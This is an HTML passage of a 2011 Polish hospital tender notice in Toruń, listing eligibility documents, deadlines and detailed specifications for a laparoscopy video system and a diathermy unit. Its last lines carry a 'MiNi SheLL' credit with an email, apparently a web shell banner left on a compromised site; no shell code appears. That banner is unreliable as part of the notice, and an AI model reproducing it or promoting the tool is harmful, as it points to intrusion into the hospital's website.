<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a/ wpis do Rejestru Wyrobów Medycznych potwierdzający, że oferowany wyrób medyczny spełnia wymagania określone w ustawie z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r. Nr 107, poz. 679), aktualny certyfikat zgodności  wyrobu z wymaganiami zasadniczymi;<br>

b/ foldery, katalogi/ prospekty oferowanego urządzenia potwierdzające spełnianie parametrów wymaganych przez Zamawiającego;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/ oświadczenie o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.<br><br>

Wykonawca na żądanie Zamawiającego i w zakresie przez niego wskazanym jest zobowiązany wykazać odpowiednio, nie później niż na dzień składania ofert spełnianie warunków, o których mowa w art. 22 ust. 1, i brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1. <br><br>

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonego przez Zamawiającego warunku.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-bielany.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych - pokój nr 2
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera 
ul. Św. Józefa 53/59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2011 godzina 09:30, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53/59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - dostawa 1 szt. toru wizyjnego do laparoskopii wraz z systemem archiwizacji danych;<br>.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.
Optyka zintegrowana ze światłowodem, adapterem i głowicą dedykowana 	   
do zabiegów laparoskopowych przez jedno cięcie <br>	 
1. Kąt patrzenia: 30°<br> 

2. Pole widzenia: 70° <br>

3.
Długość robocza: 318 mm <br>

4.
Średnica zewnętrzna tulei wprowadzającej: 5,4 mm <br>

5.
Konstrukcja uchwytu optyki z możliwością zgięcia:  optymalny kąt zgięcia 70° <br>

6.
Przyciski funkcyjne na rękojeści: 3 <br>

7.
Sterylizacja: w autoklawie <br>

II.
Tor wizyjny pracujący w systemie HDTV<br>
1.
Procesor <br>	

1.1.
Systemy telewizyjne, w których musi pracować procesor: HDTV 1080i, PAL <br>

1.2.
Ilość linii obrazu skanowanych efektywnie:	1080 linii<br>

1.3.
Możliwość ustawienia parametrów pracy kamery dla różnych specjalności lub użytkowników<br>

1.4.
Wyjścia analogowe: RGB, BNC, S-VHS <br>

1.5.
Wyjścia cyfrowe: HDSDI, SDI, Firewire <br>

1.6.
Współpraca z wideolaparoskopami z kamerą wbudowaną w końcówkę videolaparoskopu oraz standardowymi głowicami laparoskopowymi 1-no i 3-chipowymi<br>

1.7.
Klawiatura z możliwością edycji danych na monitorze oraz kontroli funkcji oraz menu kamery<br>

1.8.
Automatyczne sterowanie intensywnością oświetlenia <br>

1.9.
Zoom cyfrowy <br>

1.10.
Możliwość przypisania różnych funkcji do każdego przycisku sterującego na głowicy kamery, wideolaparoskopu lub wideoendoskopu dla rożnych użytkowników lub specjalności<br>

1.11.
Wyposażony w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem sterowania urządzeniami laparoskopowymi bloku operacyjnego<br>

2.
Ksenonowe źródło światła<br> 

2.1.
Moc źródła światła: 300 W<br> 	

2.2.
Automatyczna regulacja jasności światła<br>

2.3.
Żarówka zapasowa w przypadku uszkodzenia lampy głównej <br>	

2.4.
Wyposażone w filtr optyczny blokujący pasmo czerwone w widmie światła białego<br>

2.5.
Wyposażone w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem sterowania urządzeniami laparoskopowymi bloku operacyjnego<br> 

3.
Głowica kamery<br>

3.1.
Pracująca w systemie HDTV <br>

3.2.
Przyciski sterujące na głowicy kamery: 3<br>

3.3.
Zintegrowany adapter łączący optykę z głowicą z zamkiem zaciskowym<br>

4.
Optyka laparoskopowa w systemie HD - 1 szt.<br>

4.1.
Kąt patrzenia: 45°<br>

4.2.
Średnica zewnętrzna: 10mm<br>

4.3.
Długość robocza: 310 mm<br>

4.4
Kontener do sterylizacji<br>

5.
Optyka laparoskopowa w systemie HD - 2 szt.<br>

5.1.
Kąt patrzenia: 30°<br>

5.2.
Średnica zewnętrzna: 10mm<br>

5.3.
Długość robocza: 310 mm<br> 

5.4.
Kontener do sterylizacji<br>

6.
Światłowód - 4 szt.<br>

6.1.
Długość: 3m<br>

6.2.
Średnica zewnętrzna: 7mm <br>

6.3.
Średnica wiązki światłowodowej: 4,25 mm <br>	 

6.4.
Sterylizacja: autoklaw, 134°C, 5 minut <br>

7.
Monitor medyczny LCD - 2 szt.<br>

7.1.
Rozdzielczość ekranu: 1280 x 1024 pikseli <br>  

7.2.
Przekątna ekranu: 21cali <br> 	

7.3.
Sygnał we/wy: SVHS, PAL, RGB <br>	

7.4.
Pracujący w standardzie HDTV dostosowany do oferowanej kamery<br>

8.
Wózek - 1 szt.<br>

8.1.
Podstawa jezdna z blokadą kół<br>

8.2.
Listwa zasilająca z transformatorem separującym<br>

8.3.
Ramię ruchome do monitora pracujące w trzech płaszczyznach - 1 szt.<br>

8.4.
Możliwość ustawienia wszystkich elementów    
zestawu<br>	 

8.5.
Uchwyt na butlę CO2<br>

9.
Dodatkowe ramię na monitor - 1 szt.<br>	

9.1.
Pracujące w trzech płaszczyznach<br>

III.
Insuflator<br>

1.
Ciśnienie przepływu dwutlenku węgla: 0-25mmHg<br>

2.
Przepływ dwutlenku węgla: 35 l/min <br>

3.
Funkcja oddymiania: automatyczne oddymianie pola operacyjnego za pomocą drenu oddymiającego w czasie cięcia nożem harmonicznym 	 <br>

4.
Reakcja na przekroczenie zadanych parametrów: automatyczna desuflacja pacjenta po przekroczeniu zadanych parametrów<br>

5.
Informacja o przekroczeniu zadanego ciśnienia: alarm dźwiękowy i świetlny<br>

6.
Pobór CO2: praca z butlą lub centralnym systemem ściennym zasilania w CO2<br>

7.
Dodatkowe wyposażenie - rodzaje drenów: wyposażony w zestaw autoklawalnych 	niskociśnieniowych drenów do   insuflacji i oddymiania<br> 	   

8.
Dodatkowe wyposażenie - kabel wysokociśnieniowy: wyposażony w kabel wysokociśnieniowy do podłączenia butli CO2<br>

9.
Dodatkowe wyposażenie - rodzaje modułów: wyposażony w moduł komunikacyjny umożliwiający komunikację urządzenia z centralnym systemem/siecią urządzeń laparoskopowych bloku operacyjnego<br> 	 

IV.
Pompa płucząca<br>

1.
Parametry płukania:<br>
a) maksymalny przepływ: 0- 1,8 l/min <br>	   
b) ciśnienie: 400 mm Hg<br>

2.
Dodatkowe wyposażenie: <br>			   
a) dreny Y-kształtne, wielorazowego użytku         -5szt.<br>
b) uniwersalny uchwyt do sond ssąco-płuczących -2szt.<br>
c) sonda ssąco-płucząca z otworami na końcu dystalnym:<br>
        średnica 10mm,  długość robocza: 360 	        - 2 szt.<br>
d) sonda ssąco-płucząca z otworami na końcu dystalnym:<br>
        średnica 5,3mm, długość robocza: 360         - 2 szt.<br>

V.
Oprogramowanie dla stanowiska wideolaparoskopowego - system komputerowy do archiwizacji badań oraz obrazów laparoskopowych<br>
1.
Interfejs programu w języku polskim <br>

2.
Oprogramowanie oparte na profesjonalnej bazie danych: MS SQL<br>

3.
Możliwość konfiguracji poziomu dostępu każdego użytkownika<br> 

4.
Terminarz do prowadzenia zapisów badań <br>

5.
Pełna elektroniczna informacja o historii pacjenta z możliwością nagrania na nośnik CD/DVD<br>

6.
Wyszukiwanie pacjentów po polach: 
PESEL, Nazwisko, Imię, data ur., itp. <br>

7.
Rejestracja obrazów oraz sekwencji wideo sterowanych bezpośrednio z głowicy wideolaparoskopu w czasie rzeczywistym <br>

8.
Automatyczny transfer danych badania oraz pacjenta na monitor zestawu wideoendoskopowego <br>

9.
Edycja zdjęć oraz obróbka materiału wideo<br>

10.
Możliwość eksportowania oraz importowania zdjęć w znanych formatach: BMP, JPG, PNG <br>

11.
Możliwość eksportowania oraz importowania filmów w znanych formatach: AVI, MPG2<br>

12.
Możliwość nagrywania notatek głosowych <br>

13.
Zaznaczanie na schemacie anatomicznym miejsca zrobienia zdjęcia oraz pobrania wycinków <br>

14.
Kontrola ilości badań wykonanych przez personel oraz endoskop <br>

15.
Tworzenie raportów z badań w oparciu o bloki tekstowe z możliwością:<br> 
- edycji,
- tworzenia własnych terminologii w języku polskim
- wyborem zdjęć zarejestrowanych podczas badania.

16.
Możliwość eksportowania raportów w znanych formatach: PDF, TXT <br>

17.
Zestawienie statystyczne rodzajów badań, ilości schorzeń, liczenie kosztów badań, instytucji kierujących <br>

18.
Możliwość autoryzacji raportów badań poprzez kartę chipową zaprogramowaną w programie (opcja)<br>

19.
System dokumentacji Endo Base. Moduł pozwalający na integrację z serwerem HIS poprzez standard DICOM.<br>

20
System dokumentacji Endo Base, integracja z systemem CAPS poprzez protokół HL7.<br>

21
Współpraca z systemem komputerowym do archiwizacji badań oraz obrazów laparoskopowych.<br>

22
Stanowiska robocze z certyfikatem ISO zawierające monitor LCD, drukarkę, oprogramowanie MS Windows PL oraz licencje - 2 zestawy<br>

VI.
Pozostałe wyposażenie<br>
1.
Ruchome ramię do instalacji lamp, monitorów -2 szt.<br>

2. 
Narzędzia bipolarne: 
- kleszczyki chwytające typu Johann, bipolarne,      średnica 5 mm, długość 330 mm, długość ramion
końcówki chwytającej 16.5 mm, rączka bez zamka - 2szt. <br>

 3. 
Narzędzia laparoskopowe do zabiegów małoinwazyjnych: 
- szczypce chwytające typu Johann, osłona i wkład,  średnica 5mm długość 350 mm, podwójnie wygięte - 1szt.
- szczypce preparacyjne typu Maryland, osłona i wkład,         średnica 5mm długość 350 mm, podwójnie wygięte   - 1szt.  
- nożyczki typu Metzenbaum, osłona i wkład, 
średnica 5mm długość 350 mm, podwójnie wygięte   - 1szt. 
- uchwyt wielorazowy z przyłączem monopolarnym  - 2szt.        
- uchwyt wielorazowy z zamkiem dezaktywującym   - 1szt. <br>

VII.
Warunki dodatkowe gwarancji i serwisu<br>
1.
Wpis do rejestru wyrobów medycznych lub deklaracja zgodności CE<br>

2.
Okres gwarancji - min. 24 miesiące<br>

3.
Instrukcja obsługi i karta gwarancyjna w języku polskim<br>

4.
Czas reakcji serwisu - w ciągu 24 godzin licząc od momentu zgłoszenia awarii przez użytkownika<br>

5.
Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat<br>

6.
Bezpłatne szkolenie personelu obsługującego urządzenie<br>

7.
Bezpłatna instalacja urządzenia<br>

8.
Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji<br>

9.
Urządzenie zastępcze jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancyjnym)<br><br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa 1 szt. diatermii z systemem zamykania naczyń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.
PARAMETRY TECHNICZNE DIATERMII<br>
1.
Tryb bipolarny - moc max. 95W<br>

2.
Cięcie monopolarne, tryb czysty - moc max 300W<br>

3.
Cięcie monopolarne z hemostazą - moc max 200W<br>

4.
Tryb dynamicznego doboru stosunku napięcie (V)/prąd (A) w zależności od szybkości ruchu ręki operatora w czasie operacji - zwalniając cięcie uzyskuje się większą hemostazę koagulacje a przyspieszając uzyskuje się lepsze rozcinanie cięcie - moc max 200W<br>

5.
Koagulacja monopolarna - wyżarzanie - moc max 120 W<br>

6.
Koagulacja monopolarna - rozpylanie - moc max 120 W<br>

7.
System zamykania naczyń - moc max 350 W<br>

8.
Minimum trzy indywidualne wyświetlacze dotykowe LCD:  dwa dla pracy w systemie monopolarnym, jeden dla trybu bipolarnego, jeden dla systemu zamykania naczyń krwionośnych.<br>

9.
Waga do 1400g bez wózka i oprzyrządowania.<br>

10
Zróżnicowany sygnał dźwiękowy dla trybów alarmowych.<br>

11.
Menu w języku polskim.<br>

12.
Zróżnicowany sygnał dźwiękowy dla różnych trybów pracy.<br>

13.
Minimum: trzy gniazda urządzenia monopolarnego, jedno gniazdo urządzenia bipolarnego, dwa gniazda do systemu zamykania naczyń krwionośnych<br>

14.
Minimum: dwa gniazda sterowników nożnych: mono i bipolarny, dwa gniazda sterowników nożnych systemu zamykania naczyń krwionośnych, gniazda serwisowe, gniazdo sterowania ewakuatorem dymu.<br>

15.
Możliwość aktualizacji oprogramowania w urządzeniu przez użytkownika <br>

16.
Automatyczne rozpoznawanie końcówek roboczych przez generator.<br>

17.
Możliwość jednoczesnego podłączenia dwóch instrumentów do zamykania naczyń krwionośnych.<br>

18.
Kompatybilność i możliwość podłączenia kleszczyków systemu zamykania naczyń do zabiegów klasycznych o dł. od 16 do 18 cm.<br>

19.
Kompatybilność i możliwość podłączenia instrumentu laparoskopowego 5 mm z opcją cięcia i możliwością aktywacji z uchwytu lub włącznika nożnego.<br>

20.
Kompatybilność i możliwość podłączenia instrumentu laparoskopowego 10 mm z opcją cięcia i możliwością aktywacji z uchwytu lub włącznika nożnego.<br>


21.
Kompatybilność i możliwość podłączenia instrumentu do zabiegów klasycznych 10 mm z opcją cięcia i możliwością aktywacji z uchwytu lub włącznika nożnego.<br>

22.
Wizualizacja nastawianej mocy.<br>

23.
Urządzenie wyposażone w system zabezpieczenia pacjenta przed poparzeniem w polu przylegania płytki biernej.<br>

24.
Automatyczne przejście z furgulacji na spray w trybie dynamicznego doboru stosunku napięcie/prąd w zależności od właściwości anatomicznych tkanek tj. pomiaru jej impedancji<br>

25.
Automatyczny, adaptywny system bezpieczeństwa dla elektrody powrotnej w zakresie min 5-135Ohm<br>

26.
Funkcja autobipolar<br>

27.
Gniazda przyłączeniowe automatycznie rozpoznające podłączone narzędzie, wyświetlanie dedykowanego do obsługi narzędzia ekranu sterowniczego z zabezpieczeniem przed omyłkowym przejściem do nieodpowiednich funkcji generatora.<br>

28.
Ekrany aktywne podświetlane, ekran nieaktywny przyciemniony<br>

29.
Możliwość podłączenia uchwytu monopolarnego z możliwością pięciostopniowej regulacji mocy na rączce z aktywacją trybu cięcia, koagulacji<br>

II.
WYPOSAŻENIE DODATKOWE DIATERMII<br>
1
Ewakuator dymu elektrochirurgicznego, sześć poziomów siły ssania - 1 szt.<br>

2
Przewód łączący ewakuator dymu z generatorem elektrochirurgicznym, pozwalający na automatyczną aktywacje w czasie pracy, długość 3 m - 1 szt.<br>

3
Filtr do ewakuatora dymu - 2 szt.<br>

4
Włącznik nożny do aktywacji ewakuatora dymu - 1 szt.<br>

5
Dren podstawowy do ewakuatora dymu - 10 szt.<br>

6
Wózek montażowy ze stali kwasoodpornej, dla elektrokoagulacji z systemem zamykania naczyń, cztery półki, szuflada, uchwyty na przewody sieciowe, blokada dwóch kółek  - 1szt.<br>

7
Trzy przyciskowy włącznik nożny monopolarny do cięcia, koagulacji - pozwalającym uzyskać jednoczesne cięcie z koagulacją przy zachowaniu minimalnego  rozprzestrzenienia termicznego - 1 szt.<br>

8
Włącznik nożny do systemu zamykania naczyń, długość przewodu min. 4,5 m - 1 szt.<br>

9
Włącznik bipolarny, długość przewodu min. 4,5 m - 1 szt.<br>

10
Uchwyt monopolarny wielorazowy z elektrodą nożową, dwoma przyciskami cięcie i koagulacja, przełącznikiem kołyskowym, przewodem o dł. 4,6 m, złączem trójbolcowym kompatybilnym z oferowanym generatorem oraz elektrodami z typowym trzonkiem 2,4mm - 10szt.<br>

11
Elektroda powrotna dla pacjentów dorosłych z klejem elektroprzewodzącym oraz dzielonym stykiem szerokości 4cm, wyposażona w system kontroli jakości styku kompatybilny z oferowanym generatorem oraz z żelem zapewniającym prawidłowe przyleganie do skóry pacjenta, powierzchnia min. 150cm2 - 200 szt.<br>

12
Przewód elektrody powrotnej pacjenta z klipsem o szerokości styku 4 cm, długość przewodu 4,6 m, kompatybilny z oferowanym generatorem - 2 szt.<br>

13
Przewód do endoskopowych narzędzi monopoloarnych, współpracujący z 4 mm złączem męskim, długość min. 3,0 m (sterylizacja parowa) - 3 szt.<br>

14
Laparoskopowe narzędzie do uszczelniania i rozdzielania naczyń i pęczków tkankowych, długość 37 cm, średnica trzonu 10 mm, aktywowany ręcznie lub nożnie, z wbudowanym nożem, z przewodem, obracanym trzonem, kompatybilny z oferowanym generatorem - 2 szt.<br>

15
Narzędzie do uszczelniania i rozdzielania naczyń i pęczków tkankowych, długość 20 cm, średnica trzonu 10 mm, aktywowany ręcznie lub nożnie, z wbudowanym nożem, z przewodem, obracanym trzonem, kompatybilne z oferowanym generatorem - 3 szt.<br>

16
Precyzyjne kleszczyki do uszczelniania naczyń i pęczków tkankowych, długość elektrody 20 mm, wygięcie szczęk 15 st., długość 17 cm, z przewodem, kompatybilny z systemem zamykania naczyń do 7 mm włącznie - 6 szt.<br>

 17
Pinceta bipolarna, długość całkowita 15,2 cm, zakończenie 0,7mm - 1 szt.<br>

18
Przewód do pincety z włącznikiem nożnym, wtyk odlewany - 1 szt.<br>

III.
 WARUNKI GWARANCJI I SERWISU<br>

1.
Wpis do rejestru wyrobów medycznych lub deklaracja zgodności CE<br>

2.
Okres gwarancji - min 24 miesiące <br>

3.
Instrukcja obsługi i karta gwarancyjna w języku polskim<br> 

4.
Czas reakcji serwisu - max 24 godzin od zgłoszenia awarii przez użytkownika<br>  

5.
Gwarancja zapewnienia zakupu części zamiennych przez okres 10 lat.<br>

6.
Diatermia zastępcza jeśli naprawa nastąpi w czasie dłuższym niż 5 dni (w okresie gwarancji)<br>

7.
Bezpośrednie szkolenie personelu obsługującego urządzenie<br>  

8.
Bezpłatna instalacja urządzenia.<br>

9.
Bezpłatny przegląd techniczny min. 1 raz w roku w okresie trwania gwarancji.<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com